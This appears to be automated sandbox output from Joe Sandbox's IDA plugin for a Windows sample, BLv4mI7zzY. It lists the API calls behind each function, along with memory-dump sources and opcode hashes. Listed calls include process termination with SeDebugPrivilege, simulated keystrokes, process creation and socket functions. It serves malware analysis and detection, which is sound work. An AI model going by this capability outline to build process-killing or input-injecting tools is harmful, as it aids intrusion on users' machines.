• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,004BF910), ref: 004A8D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004A8ED6
• SysFreeString.OLEAUT32(?), ref: 004A8F00
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
APIs
• _memset.LIBCMT ref: 004AF6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004AF848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004AF86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004AF8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004AF8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004AFA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004AFA7C
• CloseHandle.KERNEL32(?), ref: 004AFAAB
• CloseHandle.KERNEL32(?), ref: 004AFB22
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
APIs
  • Part of subcall function 0049466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00493697,?), ref: 0049468B
  • Part of subcall function 0049466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00493697,?), ref: 004946A4
  • Part of subcall function 00494A31: GetFileAttributesW.KERNEL32(?,0049370B), ref: 00494A32
• lstrcmpiW.KERNEL32(?,?), ref: 00494D40
• _wcscmp.LIBCMT ref: 00494D5A
• MoveFileW.KERNEL32(?,?), ref: 00494D75
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004B86FF
Similarity
• API ID: InvalidateRect
• String ID:
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0046C2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0046C319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0046C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0046C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0046C370
• DestroyIcon.USER32(00000000), ref: 0046C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0046C39C
• DestroyIcon.USER32(?), ref: 0046C3AB
  • Part of subcall function 004BA4AF: DeleteObject.GDI32(00000000), ref: 004BA4E8
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
APIs
  • Part of subcall function 0048A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0048A84C
  • Part of subcall function 0048A82C: GetCurrentThreadId.KERNEL32 ref: 0048A853
  • Part of subcall function 0048A82C: AttachThreadInput.USER32(00000000,?,00489683,?,00000001), ref: 0048A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0048968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004896AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004896AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 004896B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004896D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004896D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 004896E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004896F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004896FB
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0048853C,00000B00,?,?), ref: 0048892A
• HeapAlloc.KERNEL32(00000000,?,0048853C,00000B00,?,?), ref: 00488931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0048853C,00000B00,?,?), ref: 00488946
• GetCurrentProcess.KERNEL32(?,00000000,?,0048853C,00000B00,?,?), ref: 0048894E
• DuplicateHandle.KERNEL32(00000000,?,0048853C,00000B00,?,?), ref: 00488951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0048853C,00000B00,?,?), ref: 00488961
• GetCurrentProcess.KERNEL32(0048853C,00000000,?,0048853C,00000B00,?,?), ref: 00488969
• DuplicateHandle.KERNEL32(00000000,?,0048853C,00000B00,?,?), ref: 0048896C
• CreateThread.KERNEL32(00000000,00000000,00488992,00000000,00000000,00000000), ref: 00488986
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 4d66477f17e594320993fccf4dfa755b4584192414850e6bca2a21dc87f95c5f
                                                              • Instruction ID: f8cf94899d591fe34c34746603da95fcba04ee3c0558e8072e66a841b771b602
                                                              • Opcode Fuzzy Hash: 4d66477f17e594320993fccf4dfa755b4584192414850e6bca2a21dc87f95c5f
                                                              • Instruction Fuzzy Hash: 0A01ACB5240304FFE610AFA9DC49F6B7B6CEB89711F404521FA09DB191CA759C048B24
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: 8f628fc233c65f8b47b59e62365f4839cabc64f7022ad398a47e72e9e8b72b7a
                                                              • Instruction ID: cf52fef17ad47969d7683f12426bcdde0a88c1d0e8c473e1b839cb3bc3bf119e
                                                              • Opcode Fuzzy Hash: 8f628fc233c65f8b47b59e62365f4839cabc64f7022ad398a47e72e9e8b72b7a
                                                              • Instruction Fuzzy Hash: 05C1C371A00209ABDF10DF58C884BAFB7F5FB59314F14842EE905AB381E778AD45CB94
                                                              APIs
                                                                • Part of subcall function 0048710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?,?,00487455), ref: 00487127
                                                                • Part of subcall function 0048710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 00487142
                                                                • Part of subcall function 0048710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 00487150
                                                                • Part of subcall function 0048710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?), ref: 00487160
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 004A9806
                                                              • _memset.LIBCMT ref: 004A9813
                                                              • _memset.LIBCMT ref: 004A9956
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 004A9982
                                                              • CoTaskMemFree.OLE32(?), ref: 004A998D
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 004A99DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: be2e5b9d3b1d818faae8ab34106d2cc2f1c744999fd7afd2df8918af681e6b5e
                                                              • Instruction ID: 30b1907e46d5e7f13fb236ecb18ba762f2e03b957c29e9abc2e808a20a4f83c1
                                                              • Opcode Fuzzy Hash: be2e5b9d3b1d818faae8ab34106d2cc2f1c744999fd7afd2df8918af681e6b5e
                                                              • Instruction Fuzzy Hash: F4913971D00229EBDB10DFA5DC81EDEBBB9AF09314F20416AF419A7281DB759A44CFA4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004B6E24
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 004B6E38
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004B6E52
                                                              • _wcscat.LIBCMT ref: 004B6EAD
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 004B6EC4
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004B6EF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: 593de034e5e4e4d0c7577d49f4f0ee42f059b4ac2b7e3f2f8a8d1d77772b2383
                                                              • Instruction ID: c20b558fdb58d53c91b410f2265d4d0fe2986c29dbe1d8ee966690228385f9d2
                                                              • Opcode Fuzzy Hash: 593de034e5e4e4d0c7577d49f4f0ee42f059b4ac2b7e3f2f8a8d1d77772b2383
                                                              • Instruction Fuzzy Hash: F741A071A00348ABEB219F64CC85BEF77A8EF08354F11052BF944A7291D6799D898B68
                                                              APIs
                                                                • Part of subcall function 00493C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00493C7A
                                                                • Part of subcall function 00493C55: Process32FirstW.KERNEL32(00000000,?), ref: 00493C88
                                                                • Part of subcall function 00493C55: CloseHandle.KERNEL32(00000000), ref: 00493D52
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004AE9A4
                                                              • GetLastError.KERNEL32 ref: 004AE9B7
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004AE9E6
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004AEA63
                                                              • GetLastError.KERNEL32(00000000), ref: 004AEA6E
                                                              • CloseHandle.KERNEL32(00000000), ref: 004AEAA3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: a080a2b34b5b5146fdea5d43db540397d76a6a728bc5186afa392bf9ed31de72
                                                              • Instruction ID: e443a5f15966283faf2c9b532830cd6138d4f4b88ee1f28935e066e11fbd9e05
                                                              • Opcode Fuzzy Hash: a080a2b34b5b5146fdea5d43db540397d76a6a728bc5186afa392bf9ed31de72
                                                              • Instruction Fuzzy Hash: 8441BF712002009FDB14EF56CC95F6EB7A5AF55318F04841EF9069B3D2DBB8AC08CB99
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00493033
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: 3a8b322f737cb3afb60ba6e45fdf9318c93562487c180e56d6fbe2951403d48c
                                                              • Instruction ID: 8a243c1926a53c7c122ca4a994ed427b1aad8f75c835ec02e748d2e39b262903
                                                              • Opcode Fuzzy Hash: 3a8b322f737cb3afb60ba6e45fdf9318c93562487c180e56d6fbe2951403d48c
                                                              • Instruction Fuzzy Hash: 26112631248386BADF149F56DC43D6B7F9C9F17366B20003FF90466282DEAC5E0456AD
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00494312
                                                              • LoadStringW.USER32(00000000), ref: 00494319
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0049432F
                                                              • LoadStringW.USER32(00000000), ref: 00494336
                                                              • _wprintf.LIBCMT ref: 0049435C
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0049437A
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00494357
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              • Opcode ID: 660666d1962b6898a538ad43d6a31ed7cc153ac45d13c518eb7c16ca01288889
                                                              • Instruction ID: 67a15d2e6a5bdde70263fd326ebd328e5485eb622182d51331a120e78095a098
                                                              • Opcode Fuzzy Hash: 660666d1962b6898a538ad43d6a31ed7cc153ac45d13c518eb7c16ca01288889
                                                              • Instruction Fuzzy Hash: 330162F3900208BFE7519BA4DD89EE7776CDB08301F0005B6BF49E6052EA745E8A4B79
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • GetSystemMetrics.USER32(0000000F), ref: 004BD47C
                                                              • GetSystemMetrics.USER32(0000000F), ref: 004BD49C
                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 004BD6D7
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004BD6F5
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004BD716
                                                              • ShowWindow.USER32(00000003,00000000), ref: 004BD735
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004BD75A
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 004BD77D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                              • String ID:
                                                              • API String ID: 1211466189-0
                                                              • Opcode ID: f855051c8cd353f3dba41f3c642fef60c18305397038325738341b19dac4791f
                                                              • Instruction ID: 5588d4f5b93a83764402d48e8ef8ebd2b62d06452ade2963f5aa18aaf1b3ca3a
                                                              • Opcode Fuzzy Hash: f855051c8cd353f3dba41f3c642fef60c18305397038325738341b19dac4791f
                                                              • Instruction Fuzzy Hash: 1AB17B71A00615EBDF14CF68C9C57EA7BB1BF04711F0881BAEC489B295EB38A950CB64
                                                              APIs
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0046C1C7,00000004,00000000,00000000,00000000), ref: 00432ACF
                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0046C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00432B17
                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0046C1C7,00000004,00000000,00000000,00000000), ref: 0046C21A
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0046C1C7,00000004,00000000,00000000,00000000), ref: 0046C286
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: b63afa98081d2f0286dda56be07d43ed2bd2616ca0751b9ddce4a298bbee4d75
                                                              • Instruction ID: d11757a1c23cc95ec0c2aa106b41c2f589901319d019f394a16d43ab9b454602
                                                              • Opcode Fuzzy Hash: b63afa98081d2f0286dda56be07d43ed2bd2616ca0751b9ddce4a298bbee4d75
                                                              • Instruction Fuzzy Hash: 54412E306047809BCB75AB298EDC77B7BD1AB4D300F14986FE48782660C6BCA846D71E
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004970DD
                                                                • Part of subcall function 00450DB6: std::exception::exception.LIBCMT ref: 00450DEC
                                                                • Part of subcall function 00450DB6: __CxxThrowException@8.LIBCMT ref: 00450E01
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00497114
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00497130
                                                              • _memmove.LIBCMT ref: 0049717E
                                                              • _memmove.LIBCMT ref: 0049719B
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004971AA
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004971BF
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004971DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 256516436-0
                                                              • Opcode ID: f4521c199c5beb2526f549205064a2a6d0a2ec58414b8abfb1d7061de204d4b7
                                                              • Instruction ID: 65c8b3a9290f7d1838d85a55be07b031bb70b21fe871e17c47d6651f53706f18
                                                              • Opcode Fuzzy Hash: f4521c199c5beb2526f549205064a2a6d0a2ec58414b8abfb1d7061de204d4b7
                                                              • Instruction Fuzzy Hash: E0317235900205EBCF00DFA5DC869AF7B78EF45311F1441BAED04AB256DB349E18CBA8
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 004B61EB
                                                              • GetDC.USER32(00000000), ref: 004B61F3
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B61FE
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004B620A
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004B6246
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004B6257
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004B902A,?,?,000000FF,00000000,?,000000FF,?), ref: 004B6291
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004B62B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: d9dc1555e50c4ad8c9f3f05f0f0377ed959ea6174997434e417a989e037c3712
                                                              • Instruction ID: 935adafaf73dda2a431baff2d52fdc4ce33f0929b3d9ee0f1a41eda9df8c6d7e
                                                              • Opcode Fuzzy Hash: d9dc1555e50c4ad8c9f3f05f0f0377ed959ea6174997434e417a989e037c3712
                                                              • Instruction Fuzzy Hash: 74318D72101210BFEF159F54CC8AFEB3BA9EF49765F040166FE089A291C6799C41CB78
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memcmp
                                                              • String ID:
                                                              • API String ID: 2931989736-0
                                                              • Opcode ID: 9545e7a404fc456d21202807966a8dd2a117247fa664fd29aef1f07cd72ac115
                                                              • Instruction ID: f8f239cbf062b6ef2a45589eaa69788bde2960d6c9124f5ffb126a56a0fe17de
                                                              • Opcode Fuzzy Hash: 9545e7a404fc456d21202807966a8dd2a117247fa664fd29aef1f07cd72ac115
                                                              • Instruction Fuzzy Hash: 8221B0616012067FA2047A129E42FBF775CDE11348B18482FFD0596B47EBACEE1683ED
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                                • Part of subcall function 0044FC86: _wcscpy.LIBCMT ref: 0044FCA9
                                                              • _wcstok.LIBCMT ref: 0049EC94
                                                              • _wcscpy.LIBCMT ref: 0049ED23
                                                              • _memset.LIBCMT ref: 0049ED56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X
                                                              • API String ID: 774024439-3081909835
                                                              • Opcode ID: 9800ec59fbd211f653009f93baf231376b8068334326a9087e245216502b4f7b
                                                              • Instruction ID: dc5ca6d883b635e57b829d48ffcaaf596575cdff625120971fc02e8b972d8e37
                                                              • Opcode Fuzzy Hash: 9800ec59fbd211f653009f93baf231376b8068334326a9087e245216502b4f7b
                                                              • Instruction Fuzzy Hash: E3C182715083419FDB64EF25C881A5EB7E0FF49314F10492EF899972A2DB78EC45CB4A
                                                              APIs
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 004A6C00
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004A6C21
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A6C34
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 004A6CEA
                                                              • inet_ntoa.WSOCK32(?), ref: 004A6CA7
